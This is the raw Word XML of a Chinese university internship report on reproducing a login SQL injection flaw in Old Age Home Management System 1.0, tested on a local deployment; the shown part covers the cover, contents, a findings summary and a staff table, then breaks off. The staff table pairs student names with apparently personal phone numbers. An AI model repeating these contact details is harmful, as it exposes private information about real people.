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586E" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74104927" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="2FD34B2A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="57F7569C" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C27C08" w14:textId="77777777" w:rsidR="002D00DD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南开大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D252F" w14:textId="77777777" w:rsidR="002D00DD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实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F285398" w14:textId="77777777" w:rsidR="002D00DD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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="391BA7B1" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FCF0FD" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B602E3" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F998460" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F781C69" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE6B133" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0628CF31" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A14039" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5329B81A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02889EC8" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E401042" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABC9743" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0003A34F" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="269CC97E" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="67EABEAA" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A169E5" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5268482A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A54229" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE7DCA3" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D082677" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="6CB8877B" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E327B62" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr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/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="71B4489F" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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2C52FCDD" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="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cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc28487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漏洞复现结论（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_Toc28487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6BB82EE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481" w:history="1">
            <w:r>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级分布</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7481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29A935D" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24528" w:history="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工作计划（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_Toc24528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F144BBF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3939" w:history="1">
            <w:r>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作人员</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc13939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8AACCFC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137" w:history="1">
            <w:r>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞对象</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3137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B8696EB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909" w:history="1">
            <w:r>
              <w:t>2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现阶段</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7909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5589821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60" w:history="1"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风险等级</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc1860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2D0ECE7" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc6133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漏洞复现过程（</w:t>
            </w:r>
            <w:r>
              <w:t>3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_Toc6133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41D1543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532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风险管理及规避</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18532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AC57FC9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4033" w:history="1"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>测试方法</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4033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5C410B1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445" w:history="1"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测试中所用的工具</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28445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DC14BDC" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12892" w:history="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漏洞复现结果（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_Toc12892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B8836F9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2666" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件编写</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc32666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B1D8A2" w14:textId="77777777" w:rsidR="002D00DD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5120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漏洞信息</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25120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8D0812A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="01F7F896" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21083B2E" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="53D31F64" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="002D00DD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681B57" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结论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"/>
    </w:p>
    <w:p w14:paraId="65EDB48A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学实习实训第八组的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia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 w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia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 w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B340D76" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia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个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia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个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个。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4714"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D00DD" w14:paraId="5E679BD0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46F56752" w14:textId="77777777" w:rsidR="002D00DD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bookmarkStart w:id="3" w:name="_Hlk482954515"/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4F898D94" w14:textId="77777777" w:rsidR="002D00DD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6B0949F8" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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风险值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="61F39402" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47D169FB" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47DB9FD8" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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Old Age Home Management System 1.0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登录存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F8FFD41" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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</w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="7B4A6CB5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5881F20F" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C30016B" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00D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2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28B322CA" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:widowControl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</w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="75E4005E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="713946F9" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D64BBF6" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00D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2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C8BAFCC" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:widowControl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</w:tr>
    </w:tbl>
    <w:p w14:paraId="46EF1F7E" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc7481"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc16656"/>
      <w:bookmarkEnd w:id="3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5E97FCAA" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4E213" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="27219DFD" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8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9"/>
    </w:p>
    <w:p w14:paraId="4FB6B765" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc13939"/>
      <w:bookmarkStart w:id="11" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="12" w:name="_Toc10156"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D00DD" w14:paraId="389C066B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="697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A67848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0612CC9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FFF190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E2F348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:rsidR="002D00DD" w14:paraId="40CD6ED6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4AF1AF9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AAB612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C17B4CC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袁铭泽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47FAAEF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13082490753</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="7077FAAC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421E3AE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3285F2E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ED840CC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许健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93AD130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18356357915</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="7163F025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5D88954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192446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2915338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杜一凡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C325141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17744403620</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="241CC0F4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200AADD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EA797A9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71EAC9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吕昆娴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3490A4C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5943548836</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="5B8F7FB0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E232515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552A2AC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E3766B1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运开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E6B75B5" w14:textId="77777777" w:rsidR="002D00DD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8532068598</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B226219" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="611A26C8" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old Age Home Management System 1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在本地部署测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EAE5B" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
